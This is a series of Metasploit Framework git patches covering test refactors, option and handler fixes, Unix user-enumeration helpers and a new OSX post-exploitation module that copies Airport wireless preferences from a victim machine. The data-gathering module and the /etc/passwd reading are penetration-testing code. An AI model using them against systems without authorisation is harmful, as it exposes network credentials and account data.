ModuleTest API --- test/modules/post/test/registry.rb | 210 ++++++++++++++++------------- 1 file changed, 116 insertions(+), 94 deletions(-) diff --git a/test/modules/post/test/registry.rb b/test/modules/post/test/registry.rb index 6e5b0e0e00..14cbc45f26 100644 --- a/test/modules/post/test/registry.rb +++ b/test/modules/post/test/registry.rb @@ -16,118 +16,140 @@ require 'msf/core/post/windows/registry' class Metasploit3 < Msf::Post + include Msf::ModuleTest::PostTest include Msf::Post::Windows::Registry def initialize(info={}) super( update_info( info, 'Name' => 'registry_post_testing', - 'Description' => %q{ This module will test registry code used in post modules}, + 'Description' => %q{ This module will test Post::Windows::Registry API methods }, 'License' => MSF_LICENSE, - 'Author' => [ 'kernelsmith'], + 'Author' => [ + 'kernelsmith', # original + 'egypt', # PostTest conversion + ], 'Version' => '$Revision$', 'Platform' => [ 'windows' ] )) - register_options( - [ - OptString.new("KEY" , [true, "Registry key to test", "HKLM\\Software\\Microsoft\\Active Setup"]), - OptString.new("VALUE" , [true, "Registry value to test", "DisableRepair"]), - ], self.class) + end + + def test_0_registry_read + pending "should evaluate key existence" do + # these methods are not implemented + k_exists = registry_key_exist?(%q#HKCU\Environment#) + k_dne = registry_key_exist?(%q#HKLM\\Non\Existent\Key#) + + (k_exists && !k_dne) + end + + pending "should evaluate value existence" do + # these methods are not implemented + v_exists = registry_value_exist?(%q#HKCU\Environment#, "TEMP") + v_dne = registry_value_exist?(%q#HKLM\\Non\Existent\Key#, "asdf") + + (v_exists && !v_dne) + end + + it "should read values" do + ret = true + valinfo = registry_getvalinfo(%q#HKCU\Environment#, "TEMP") + ret &&= !!(valinfo["Data"]) + ret &&= !!(valinfo["Type"]) + + valdata = registry_getvaldata(%q#HKCU\Environment#, "TEMP") + ret &&= !!(valinfo["Data"] == valdata) + + ret + end + + it "should return normalized values" do + ret = true + valinfo = registry_getvalinfo(%q#HKCU\Environment#, "TEMP") + if (valinfo.nil?) + ret = false + else + # type == 2 means string + ret &&= !!(valinfo["Type"] == 2) + ret &&= !!(valinfo["Data"].kind_of? String) + + valinfo = registry_getvalinfo(%q#HKLM\Software\Microsoft\Active Setup#, "DisableRepair") + if (valinfo.nil?) + ret = false + else + # type == 4 means DWORD + ret &&= !!(valinfo["Type"] == 4) + ret &&= !!(valinfo["Data"].kind_of? Numeric) + end + end + + ret + end + + it "should enumerate keys and values" do + ret = true + # Has no keys, should return an empty Array + keys = registry_enumkeys(%q#HKCU\Environment#) + ret &&= (keys.kind_of? Array) + + vals = registry_enumvals(%q#HKCU\Environment#) + ret &&= (vals.kind_of? Array) + ret &&= (vals.count > 0) + ret &&= (vals.include? "TEMP") + + ret + end end - def run - print_status("Running against session #{datastore["SESSION"]}") - print_status("Session type is #{session.type}") + def test_1_registry_write + it "should create keys" do + ret = registry_createkey(%q#HKCU\test_key#) + end - print_status() - print_status("TESTING: registry_value_exist? for key:#{datastore['KEY']}, val:#{datastore['VALUE']}") - results = registry_value_exist?(datastore['KEY'],datastore['VALUE']) - print_status("RESULTS: #{results.class} #{results.inspect}") - - print_status() - print_status("TESTING: registry_value_exist? for key:#{'HKLM\\Non\Existent\key'}, val:#{datastore['VALUE']}") - results = registry_value_exist?('HKLM\\Non\Existent\key',datastore['VALUE']) - print_status("RESULTS (Expecting false): #{results.class} #{results.inspect}") - - print_status() - print_status("TESTING: registry_value_exist? for key:#{datastore['KEY']}, val:'NonExistentValue'") - results = registry_value_exist?(datastore['KEY'],'NonExistentValue') - print_status("RESULTS (Expecting false): #{results.class} #{results.inspect}") - - print_status() - print_status("TESTING: registry_key_exist? for key: 'HKLM\\Non\Existent\key'") - results = registry_key_exist?('HKLM\\Non\Existent\key') # need to error handle this properly in meterp ver - print_status("RESULTS (Expecting false): #{results.class} #{results.inspect}") - - print_status() - print_status("TESTING: registry_key_exist? for key:#{datastore['KEY']}") - results = registry_key_exist?(datastore['KEY']) - print_status("RESULTS: #{results.class} #{results.inspect}") - - print_status() - print_status("TESTING: registry_getvalinfo for key:#{datastore['KEY']}, val:#{datastore['VALUE']}") - results = registry_getvalinfo(datastore['KEY'], datastore['VALUE']) - print_error("reported failure") unless results - print_status("RESULTS: #{results.class} #{results.inspect}") - - print_status() - print_status("TESTING: registry_getvaldata for key:#{datastore['KEY']}, val:#{datastore['VALUE']}") - results = registry_getvaldata(datastore['KEY'], datastore['VALUE']) - print_error("reported failure") unless results - print_status("RESULTS: #{results.class} #{results.inspect}") + it "should write REG_SZ values" do + ret = true + registry_setvaldata(%q#HKCU\test_key#, "test_val_str", "str!", "REG_SZ") + registry_setvaldata(%q#HKCU\test_key#, "test_val_dword", 1234, "REG_DWORD") + valinfo = registry_getvalinfo(%q#HKCU\test_key#, "test_val_str") + if (valinfo.nil?) + ret = false + else + # type == REG_SZ means string + ret &&= !!(valinfo["Type"] == 1) + ret &&= !!(valinfo["Data"].kind_of? String) + ret &&= !!(valinfo["Data"] == "str!") + end - print_status() - print_status("TESTING: registry_createkey for key:#{datastore['KEY']}\\test") - results = registry_createkey("#{datastore['KEY']}\\test") - print_error("reported failure") if results - print_status("RESULTS: #{results.class} #{results.inspect}") + ret + end - print_status() - print_status("TESTING: registry_setvaldata for key:#{datastore['KEY']}\\test, val:test, data:test, type:REG_SZ") - results = registry_setvaldata("#{datastore['KEY']}\\test", "test", "test", "REG_SZ") - print_error("reported failure") if results - print_status("RESULTS: #{results.class} #{results.inspect}") - print_status() - print_status("Running registry_getvalinfo for freshly created key:#{datastore['KEY']}\\test, val:test") - results = registry_getvalinfo("#{datastore['KEY']}\\test", "test") - print_error("reported failure") unless results - print_status("RESULTS: #{results.class} #{results.inspect}") + it "should write REG_DWORD values" do + ret = true + registry_setvaldata(%q#HKCU\test_key#, "test_val_dword", 1234, "REG_DWORD") + valinfo = registry_getvalinfo(%q#HKCU\test_key#, "test_val_dword") + if (valinfo.nil?) + ret = false + else + ret &&= !!(valinfo["Type"] == 4) + ret &&= !!(valinfo["Data"].kind_of? Numeric) + ret &&= !!(valinfo["Data"] == 1234) + end + ret + end - print_status() - print_status("TESTING: registry_deleteval for key:#{datastore['KEY']}\\test, val:test") - results = registry_deleteval("#{datastore['KEY']}\\test", "test") - print_error("reported failure") if results - print_status("RESULTS: #{results.class} #{results.inspect}") + it "should delete keys" do + ret = registry_deleteval(%q#HKCU\test_key#, "test_val_str") + valinfo = registry_getvalinfo(%q#HKCU\test_key#, "test_val_str") + # getvalinfo should return nil for a non-existent key + ret &&= (valinfo.nil?) + ret &&= registry_deletekey(%q#HKCU\test_key#) + # Deleting the key should delete all its values + valinfo = registry_getvalinfo(%q#HKCU\test_key#, "test_val_dword") + ret &&= (valinfo.nil?) - print_status() - print_status("TESTING: registry_deletekey") - results = registry_deletekey("#{datastore['KEY']}\\test") - print_error("reported failure") if results - print_status("RESULTS: #{results.class} #{results.inspect}") - - print_status() - print_status("Running registry_getvalinfo for deleted key:#{datastore['KEY']}\\test, val:test") - print_status("NOTE: this OUGHT to return nil") - results = registry_getvalinfo("#{datastore['KEY']}\\test", "test") - print_status("RESULTS (Expecting nil): #{results.class} #{results.inspect}") - print_error("reported failure") if results - print_status("nil is correct. sweet.") if !results - - print_status() - print_status("TESTING: registry_enumkeys") - results = registry_enumkeys(datastore['KEY']) - print_error("reported failure") unless results - print_status("RESULTS: #{results.class} #{results.inspect}") - - print_status() - print_status("TESTING: registry_enumvals") - results = registry_enumvals(datastore['KEY']) - print_error("reported failure") unless results - print_status("RESULTS: #{results.class} #{results.inspect}") - - print_status() - print_status("Testing Complete!") + ret + end end From 98882621c059ca8f4fabfeb6a21b8bd8cd5c7210 Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 26 Mar 2012 17:06:43 -0600 Subject: [PATCH 29/46] Allow empty values for OptRegexp options --- lib/msf/core/option_container.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/lib/msf/core/option_container.rb b/lib/msf/core/option_container.rb index 49ffcdb101..c2242dcf93 100644 --- a/lib/msf/core/option_container.rb +++ b/lib/msf/core/option_container.rb @@ -462,6 +462,7 @@ class OptRegexp < OptBase unless super return false end + return true if (not required? and value.nil?) begin Regexp.compile(value) @@ -473,6 +474,7 @@ class OptRegexp < OptBase end def normalize(value) + return nil if value.nil? return Regexp.compile(value) end From 988817389660023c5d1fc858d4ddf9488ba9d71f Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 26 Mar 2012 17:08:33 -0600 Subject: [PATCH 30/46] Convert railgun tests to ModuleTest API --- .../post/test/railgun_reverse_lookups.rb | 82 ++++++++++++++----- 1 file changed, 61 insertions(+), 21 deletions(-) diff --git a/test/modules/post/test/railgun_reverse_lookups.rb b/test/modules/post/test/railgun_reverse_lookups.rb index 5571f42373..d921cbcf76 100644 --- a/test/modules/post/test/railgun_reverse_lookups.rb +++ b/test/modules/post/test/railgun_reverse_lookups.rb @@ -12,9 +12,11 @@ require 'msf/core' require 'rex' require 'msf/core/post/windows/railgun' +load 'lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb' class Metasploit3 < Msf::Post + include Msf::ModuleTest::PostTest include Msf::Post::Windows::Railgun def initialize(info={}) @@ -26,33 +28,71 @@ class Metasploit3 < Msf::Post 'Version' => '$Revision$', 'Platform' => [ 'windows' ] )) + register_options( - [ - OptInt.new("ERR_CODE" , [true, "Error code to reverse lookup", 0x420]), - OptInt.new("WIN_CONST", [true, "Windows constant to reverse lookup", 4]), - OptRegexp.new("WCREGEX", [false,"Regexp to apply to constant rev lookup", '^SERVICE']), - OptRegexp.new("ECREGEX", [false,"Regexp to apply to error code lookup", '^ERROR_SERVICE_']), + [ + OptInt.new("ERR_CODE", [ false, "Error code to reverse lookup" ]), + OptInt.new("WIN_CONST", [ false, "Windows constant to reverse lookup" ]), + OptRegexp.new("WCREGEX", [ false, "Regexp to apply to constant rev lookup" ]), + OptRegexp.new("ECREGEX", [ false, "Regexp to apply to error code lookup" ]), ], self.class) end - def run - print_debug datastore['ECREGEX'] - print_status("Running against session #{datastore["SESSION"]}") - print_status("Session type is #{session.type}") + def test_static + + it "should return a constant name given a const and a filter" do + ret = true + results = select_const_names(4, /^SERVICE/) + + ret &&= !!(results.kind_of? Array) + # All of the returned values should match the filter and have the same value + results.each { |const| + ret &&= !!(const =~ /^SERVICE/) + ret &&= !!(session.railgun.constant_manager.parse(const) == 4) + } + + # Should include things that match the filter and the value + ret &&= !!(results.include? "SERVICE_RUNNING") + # Should NOT include things that match the value but not the filter + ret &&= !!(not results.include? "CLONE_FLAG_ENTITY") + + ret + end + + it "should return an error string given an error code" do + ret = true + results = lookup_error(0x420, /^ERROR_SERVICE/) + ret &&= !!(results.kind_of? Array) + ret &&= !!(results.length == 1) + + ret + end + + end + + def test_datastore + + if (datastore["WIN_CONST"]) + it "should look up arbitrary constants" do + ret = true + results = select_const_names(datastore['WIN_CONST'], datastore['WCREGEX']) + vprint_status("RESULTS: #{results.class} #{results.pretty_inspect}") + + ret + end + end + + if (datastore["ERR_CODE"]) + it "should look up arbitrary error codes" do + ret = true + results = lookup_error(datastore['ERR_CODE'], datastore['ECREGEX']) + vprint_status("RESULTS: #{results.class} #{results.inspect}") + + ret + end + end - print_status() - print_status("TESTING: select_const_names on #{datastore['WIN_CONST']} filtering by #{datastore['WCREGEX'].to_s}") - results = select_const_names(datastore['WIN_CONST'],datastore['WCREGEX']) - print_status("RESULTS: #{results.class} #{results.pretty_inspect}") - - print_status() - print_status("TESTING: error_lookup on #{datastore['ERR_CODE']} filtering by #{datastore['ECREGEX'].to_s}") - results = lookup_error(datastore['ERR_CODE'],datastore['ECREGEX']) - print_status("RESULTS: #{results.class} #{results.inspect}") - - print_status() - print_status("Testing Complete!") end end From ad92eff66c862229e39947a92f9ae834c8a29e52 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Mon, 26 Mar 2012 22:43:33 -0500 Subject: [PATCH 31/46] Correct an issue where launched exploits only used saved configurations --- lib/msf/base/simple/auxiliary.rb | 2 +- lib/msf/base/simple/exploit.rb | 2 +- lib/msf/base/simple/framework.rb | 4 ++-- lib/msf/base/simple/module.rb | 4 ++-- lib/msf/base/simple/post.rb | 2 +- 5 files changed, 7 insertions(+), 7 deletions(-) diff --git a/lib/msf/base/simple/auxiliary.rb b/lib/msf/base/simple/auxiliary.rb index b5cd6fab2c..195072800a 100644 --- a/lib/msf/base/simple/auxiliary.rb +++ b/lib/msf/base/simple/auxiliary.rb @@ -44,7 +44,7 @@ module Auxiliary # Clone the module to prevent changes to the original instance mod = omod.replicant - Msf::Simple::Framework.simplify_module(mod) + Msf::Simple::Framework.simplify_module( mod, false ) # Import options from the OptionStr or Option hash. mod._import_extra_options(opts) diff --git a/lib/msf/base/simple/exploit.rb b/lib/msf/base/simple/exploit.rb index 11802d0a35..9665438349 100644 --- a/lib/msf/base/simple/exploit.rb +++ b/lib/msf/base/simple/exploit.rb @@ -60,7 +60,7 @@ module Exploit # Clone the module to prevent changes to the original instance exploit = oexploit.replicant - Msf::Simple::Framework.simplify_module( exploit ) + Msf::Simple::Framework.simplify_module( exploit, false ) # Import options from the OptionStr or Option hash. diff --git a/lib/msf/base/simple/framework.rb b/lib/msf/base/simple/framework.rb index 27d8392938..b9d3fde778 100644 --- a/lib/msf/base/simple/framework.rb +++ b/lib/msf/base/simple/framework.rb @@ -136,12 +136,12 @@ module Framework # Simplifies a module instance if the type is supported by extending it # with the simplified module interface. # - def self.simplify_module(instance) + def self.simplify_module(instance, load_saved_config = true) if ((ModuleSimplifiers[instance.type]) and (instance.class.include?(ModuleSimplifiers[instance.type]) == false)) instance.extend(ModuleSimplifiers[instance.type]) - instance.init_simplified + instance.init_simplified(load_saved_config) end end diff --git a/lib/msf/base/simple/module.rb b/lib/msf/base/simple/module.rb index 48a9ddfac4..396d9d99c5 100644 --- a/lib/msf/base/simple/module.rb +++ b/lib/msf/base/simple/module.rb @@ -32,8 +32,8 @@ module Module # # Initializes the simplified interface. # - def init_simplified - load_config + def init_simplified(load_saved_config=true) + load_config if load_saved_config end # diff --git a/lib/msf/base/simple/post.rb b/lib/msf/base/simple/post.rb index d9c5c01647..c5174e5204 100644 --- a/lib/msf/base/simple/post.rb +++ b/lib/msf/base/simple/post.rb @@ -40,7 +40,7 @@ module Post # Clone the module to prevent changes to the original instance mod = omod.replicant - Msf::Simple::Framework.simplify_module( mod ) + Msf::Simple::Framework.simplify_module( mod, false ) # Import options from the OptionStr or Option hash. mod._import_extra_options(opts) From 670e15b40fc83cfa5e8515a78b310d102a955d41 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 27 Mar 2012 01:18:38 -0500 Subject: [PATCH 32/46] Add OSX Gather Airport post module --- modules/post/osx/gather/enum_airport.rb | 74 +++++++++++++++++++++++++ 1 file changed, 74 insertions(+) create mode 100644 modules/post/osx/gather/enum_airport.rb diff --git a/modules/post/osx/gather/enum_airport.rb b/modules/post/osx/gather/enum_airport.rb new file mode 100644 index 0000000000..9fa58848ae --- /dev/null +++ b/modules/post/osx/gather/enum_airport.rb @@ -0,0 +1,74 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' +require 'msf/core/post/common' +require 'rexml/document' + +class Metasploit3 < Msf::Post + + include Msf::Post::Common + + def initialize(info={}) + super(update_info(info, + 'Name' => 'OSX Gather Airport Wireless Preferences', + 'Description' => %q{ + This module will download OSX Airport Wireless preferences from the victim + machine. The preferences file (which is a plist) contains information such as: + SSID, Channels, Security Type, Password ID, etc. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'sinn3r'], + 'Platform' => [ 'osx' ], + 'SessionTypes' => [ "shell" ] + )) + end + + def exec(cmd) + begin + out = cmd_exec(cmd).chomp + rescue ::Timeout::Error => e + vprint_error("#{@peer} - #{e.message} - retrying...") + retry + rescue EOFError => e + vprint_error("#{@peer} - #{e.message} - retrying...") + retry + end + end + + + def get_air_preferences + pref = exec("cat /Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist") + return pref =~ /No such file or directory/ ? nil : pref + end + + def save(data) + p = store_loot( + "apple.airport.preferences", + "plain/text", + session, + data, + "com.apple.airport.preferences.plist") + + print_good("#{@peer} - plist saved in #{p}") + end + + def run + @peer = "#{session.session_host}:#{session.session_port}" + + # Download the plist. If not found (nil), then bail + pref = get_air_preferences + if pref.nil? + print_error("#{@peer} - Unable to find airport preferences") + return + end + + # Save the raw version of the plist + save(pref) + end + +end From e44f9d06ecc33aa39c6bad5004e3309297c2e340 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 27 Mar 2012 01:24:12 -0500 Subject: [PATCH 33/46] Remove the extra 'require' --- modules/post/osx/gather/enum_airport.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/post/osx/gather/enum_airport.rb b/modules/post/osx/gather/enum_airport.rb index 9fa58848ae..7171c4dc19 100644 --- a/modules/post/osx/gather/enum_airport.rb +++ b/modules/post/osx/gather/enum_airport.rb @@ -7,7 +7,6 @@ require 'msf/core' require 'msf/core/post/common' -require 'rexml/document' class Metasploit3 < Msf::Post From a0f0aadad332f7c36caa3f0f8c3562b7e64432dc Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Tue, 27 Mar 2012 08:32:47 -0500 Subject: [PATCH 34/46] Fixing checksum uri generator again. This time, it's ensured that generate_uri_checksum(sum) will succeed, provided the sum is an even number between 80 and 100 (tested) It's still not great for arbitrary checksum targets, but that's because there are lots of strings that cannot satisfy the requirement. I kind of think this is the fault of Rex. --- lib/msf/core/handler/reverse_http.rb | 11 +++++++---- lib/msf/core/handler/reverse_https.rb | 9 ++++++--- 2 files changed, 13 insertions(+), 7 deletions(-) diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index 148e78dd46..d23519cf78 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb @@ -60,14 +60,17 @@ module ReverseHttp uri_match end - + # # Create a URI that matches a given checksum # def generate_uri_checksum(sum) - uri = Rex::Text.rand_text_alphanumeric(3) - ("a".."z").sort_by {rand}.each do |x| - return(uri + x) if Rex::Text.checksum8(uri + x) + chk = ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a + 32.times do + uri = Rex::Text.rand_text_alphanumeric(3) + chk.sort_by {rand}.each do |x| + return(uri + x) if Rex::Text.checksum8(uri + x) == sum + end end raise RuntimeError, "Unable to generate a string with checksum #{sum}" end diff --git a/lib/msf/core/handler/reverse_https.rb b/lib/msf/core/handler/reverse_https.rb index da94a3f670..1293cd7f5e 100644 --- a/lib/msf/core/handler/reverse_https.rb +++ b/lib/msf/core/handler/reverse_https.rb @@ -66,9 +66,12 @@ module ReverseHttps # Create a URI that matches a given checksum # def generate_uri_checksum(sum) - uri = Rex::Text.rand_text_alphanumeric(3) - ("a".."z").sort_by {rand}.each do |x| - return(uri + x) if Rex::Text.checksum8(uri + x) + chk = ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a + 32.times do + uri = Rex::Text.rand_text_alphanumeric(3) + chk.sort_by {rand}.each do |x| + return(uri + x) if Rex::Text.checksum8(uri + x) == sum + end end raise RuntimeError, "Unable to generate a string with checksum #{sum}" end From cd3b96b919a1afabd7f1d4594b0dfd8c2ae49592 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 27 Mar 2012 09:39:50 -0600 Subject: [PATCH 35/46] Add a simple test for unix shells --- test/modules/post/test/unix.rb | 50 ++++++++++++++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 test/modules/post/test/unix.rb diff --git a/test/modules/post/test/unix.rb b/test/modules/post/test/unix.rb new file mode 100644 index 0000000000..8aefada1eb --- /dev/null +++ b/test/modules/post/test/unix.rb @@ -0,0 +1,50 @@ + +require 'module_test' + +#load 'test/lib/module_test.rb' +#load 'lib/rex/text.rb' +#load 'lib/msf/core/post/linux/system.rb' +#load 'lib/msf/core/post/unix/enum_user_dirs.rb' + +class Metasploit4 < Msf::Post + + include Msf::ModuleTest::PostTest + include Msf::Post::Linux::System + include Msf::Post::Unix + include Msf::Post::Common + + def initialize(info={}) + super( update_info( info, + 'Name' => 'Testing remote unix system manipulation', + 'Description' => %q{ This module will test Post::File API methods }, + 'License' => MSF_LICENSE, + 'Author' => [ 'egypt'], + 'Version' => '$Revision$', + 'Platform' => [ 'linux', 'java' ], + 'SessionTypes' => [ 'meterpreter', 'shell' ] + )) + end + + def test_unix + it "should list users" do + ret = true + users = get_users + ret &&= users.kind_of? Array + ret &&= users.length > 0 + have_root = false + if ret + users.each { |u| + next unless u[:name] == "root" + have_root = true + } + end + ret + ret &&= have_root + + ret + end + + end + +end + From 6de7d5aac75257e0f26742157286963d7fedf4fe Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 27 Mar 2012 10:05:42 -0600 Subject: [PATCH 36/46] Remove loads --- test/modules/post/test/file.rb | 8 +++++--- test/modules/post/test/railgun_reverse_lookups.rb | 1 - 2 files changed, 5 insertions(+), 4 deletions(-) diff --git a/test/modules/post/test/file.rb b/test/modules/post/test/file.rb index 7354176c17..cd5d1723da 100644 --- a/test/modules/post/test/file.rb +++ b/test/modules/post/test/file.rb @@ -1,7 +1,9 @@ -#require 'module_test' -load 'test/lib/module_test.rb' + +require 'module_test' + +#load 'test/lib/module_test.rb' #load 'lib/rex/text.rb' -load 'lib/msf/core/post/file.rb' +#load 'lib/msf/core/post/file.rb' class Metasploit4 < Msf::Post diff --git a/test/modules/post/test/railgun_reverse_lookups.rb b/test/modules/post/test/railgun_reverse_lookups.rb index d921cbcf76..86b8efbde7 100644 --- a/test/modules/post/test/railgun_reverse_lookups.rb +++ b/test/modules/post/test/railgun_reverse_lookups.rb @@ -12,7 +12,6 @@ require 'msf/core' require 'rex' require 'msf/core/post/windows/railgun' -load 'lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb' class Metasploit3 < Msf::Post From 812457fed0493e2bc9c6bc5efd35f4dc5ead53f3 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 27 Mar 2012 10:52:16 -0600 Subject: [PATCH 37/46] Rename enum_user_dirs --- lib/msf/core/post/unix.rb | 81 +++++++++++++++++++ lib/msf/core/post/unix/enum_user_dirs.rb | 33 -------- .../post/multi/gather/fetchmailrc_creds.rb | 2 +- modules/post/multi/gather/netrc_creds.rb | 2 +- 4 files changed, 83 insertions(+), 35 deletions(-) create mode 100644 lib/msf/core/post/unix.rb delete mode 100644 lib/msf/core/post/unix/enum_user_dirs.rb diff --git a/lib/msf/core/post/unix.rb b/lib/msf/core/post/unix.rb new file mode 100644 index 0000000000..f39dc7b54a --- /dev/null +++ b/lib/msf/core/post/unix.rb @@ -0,0 +1,81 @@ + +module Msf +class Post +module Unix + + # Returns an array of hashes each representing a user + # Keys are name, uid, gid, info, dir and shell + def get_users + users = [] + etc_passwd = nil + [ + "/etc/passwd", + "/etc/security/passwd", + "/etc/master.passwd", + ].each { |f| + if file_exist?(f) + etc_passwd = f + break + end + } + cmd_out = read_file(etc_passwd).split("\n") + cmd_out.each do |l| + entry = {} + user_field = l.split(":") + entry[:name] = user_field[0] + entry[:uid] = user_field[2] + entry[:gid] = user_field[3] + entry[:info] = user_field[4] + entry[:dir] = user_field[5] + entry[:shell] = user_field[6] + users << entry + end + return users + end + + # Returns an array of hashes each hash representing a user group + # Keys are name, gid and users + def get_groups + groups = [] + cmd_out = read_file("/etc/group").split("\n") + cmd_out.each do |l| + entry = {} + user_field = l.split(":") + entry[:name] = user_field[0] + entry[:gid] = user_field[2] + entry[:users] = user_field[3] + groups << entry + end + return groups + end + + # returns all user directories found + def enum_user_directories + user_dirs = [] + + # get all user directories from /etc/passwd + read_file("/etc/passwd").each_line do |passwd_line| + user_dirs << passwd_line.split(/:/)[5] + end + + # also list other common places for home directories in the event that + # the users aren't in /etc/passwd (LDAP, for example) + case session.platform + when 'osx' + user_dirs << cmd_exec('ls /Users').each_line.map { |l| "/Users/#{l}" } + else + user_dirs << cmd_exec('ls /home').each_line.map { |l| "/home/#{l}" } + end + + user_dirs.flatten! + user_dirs.sort! + user_dirs.uniq! + user_dirs.compact! + + user_dirs + end + +end +end +end + diff --git a/lib/msf/core/post/unix/enum_user_dirs.rb b/lib/msf/core/post/unix/enum_user_dirs.rb deleted file mode 100644 index 0bd7768d8c..0000000000 --- a/lib/msf/core/post/unix/enum_user_dirs.rb +++ /dev/null @@ -1,33 +0,0 @@ -module Msf -class Post -module Unix - include ::Msf::Post::Common - - # returns all user directories found - def enum_user_directories - user_dirs = [] - - # get all user directories from /etc/passwd - read_file("/etc/passwd").each_line do |passwd_line| - user_dirs << passwd_line.split(/:/)[5] - end - - # also list other common places for home directories in the event that - # the users aren't in /etc/passwd (LDAP, for example) - case session.platform - when 'osx' - user_dirs << cmd_exec('ls /Users').each_line.map { |l| "/Users/#{l}" } - else - user_dirs << cmd_exec('ls /home').each_line.map { |l| "/home/#{l}" } - end - - user_dirs.flatten! - user_dirs.sort! - user_dirs.uniq! - user_dirs.compact! - - user_dirs - end -end -end -end diff --git a/modules/post/multi/gather/fetchmailrc_creds.rb b/modules/post/multi/gather/fetchmailrc_creds.rb index 1d95571620..088a3ce749 100644 --- a/modules/post/multi/gather/fetchmailrc_creds.rb +++ b/modules/post/multi/gather/fetchmailrc_creds.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/post/common' require 'msf/core/post/file' -require 'msf/core/post/unix/enum_user_dirs' +require 'msf/core/post/unix' class Metasploit3 < Msf::Post diff --git a/modules/post/multi/gather/netrc_creds.rb b/modules/post/multi/gather/netrc_creds.rb index 20fcf7a8ce..a1ef931bff 100644 --- a/modules/post/multi/gather/netrc_creds.rb +++ b/modules/post/multi/gather/netrc_creds.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/post/common' require 'msf/core/post/file' -require 'msf/core/post/unix/enum_user_dirs' +require 'msf/core/post/unix' class Metasploit3 < Msf::Post From 64b0f50baabf88a473e6e7326e0e731b2abbb4d1 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Tue, 27 Mar 2012 15:29:28 -0500 Subject: [PATCH 38/46] Update for compatibility --- external/ruby-lorcon2/Lorcon2.c | 4 +++- external/ruby-lorcon2/extconf.rb | 8 ++++++-- 2 files changed, 9 insertions(+), 3 deletions(-) diff --git a/external/ruby-lorcon2/Lorcon2.c b/external/ruby-lorcon2/Lorcon2.c index beb51e0f28..226b6cc773 100644 --- a/external/ruby-lorcon2/Lorcon2.c +++ b/external/ruby-lorcon2/Lorcon2.c @@ -151,7 +151,9 @@ static VALUE Lorcon_create(int argc, VALUE *argv, VALUE self) { obj = Data_Make_Struct(cDevice, struct rldev, 0, Lorcon_free, rld); rld->context = lorcon_create(intf, dri); - lorcon_set_timeout(rld->context, 100); + + // Obsolete: XXX + // lorcon_set_timeout(rld->context, 100); if (rld->context == NULL) { rb_raise(rb_eRuntimeError, diff --git a/external/ruby-lorcon2/extconf.rb b/external/ruby-lorcon2/extconf.rb index 3dd95721b2..955244f708 100644 --- a/external/ruby-lorcon2/extconf.rb +++ b/external/ruby-lorcon2/extconf.rb @@ -1,12 +1,16 @@ #!/usr/bin/env ruby require 'mkmf' -if ( RUBY_VERSION =~ /^1\.9/ ) + +$CFLAGS += " -I/usr/include/lorcon2" + +if ( RUBY_VERSION =~ /^(1\.9|2\.0)/ ) $CFLAGS += " -DRUBY_19" end -if (have_library("orcon2", "lorcon_list_drivers", "lorcon2/lorcon.h") or find_library("orcon2", "lorcon_list_drivers", "lorcon2/lorcon.h")) +if find_library("orcon2", "lorcon_list_drivers", "lorcon2/lorcon.h") create_makefile("Lorcon2") else puts "Error: the lorcon2 library was not found, please see the README" end + From 5248ec87b5492e489164d7ac6ffd6b1468e8f681 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Tue, 27 Mar 2012 16:49:20 -0500 Subject: [PATCH 39/46] Fixing EDB reference --- modules/exploits/unix/http/freepbx_callmenum.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/http/freepbx_callmenum.rb b/modules/exploits/unix/http/freepbx_callmenum.rb index f279d0140a..01cfaecdae 100644 --- a/modules/exploits/unix/http/freepbx_callmenum.rb +++ b/modules/exploits/unix/http/freepbx_callmenum.rb @@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'References' => [ - [ 'URL', 'http://www.exploit-db.com/exploits/18649/' ] + [ 'EDB', '18649' ] ], 'Platform' => ['unix'], 'Arch' => ARCH_CMD, From f1d66b941ef235fbe8d7f4664ecc973655dbd0b6 Mon Sep 17 00:00:00 2001 From: Raphael Mudge Date: Tue, 27 Mar 2012 20:01:37 -0400 Subject: [PATCH 40/46] Armitage 03.28.12. Mostly performance improvements. --- data/armitage/armitage.jar | Bin 2861424 -> 2868473 bytes data/armitage/whatsnew.txt | 24 ++++++++++++++++++++++++ 2 files changed, 24 insertions(+) diff --git a/data/armitage/armitage.jar b/data/armitage/armitage.jar index afa7246e0023191b1e23215c90949dc3ed76c4ae..02e92a3125c73293742abad4176a30ecd5fb8bf5 100755 GIT binary patch delta 118178 zcmaI81yo#1(>98`ySux)ySux)yH6mv!{F{7+%32Umk`|DA%vhmCpqtbzxP}B-dStb zQ`6PEW_NdWb?>KZ=6b#s^mkMpD58oyI0PIB2n+~_MZSL$A`Q6t2kpU<73E`N{_jO7oSfHD2SBrv*vKNF^ZY5|1??t;nuDR2d6O?NQ?h58@g@{e6t 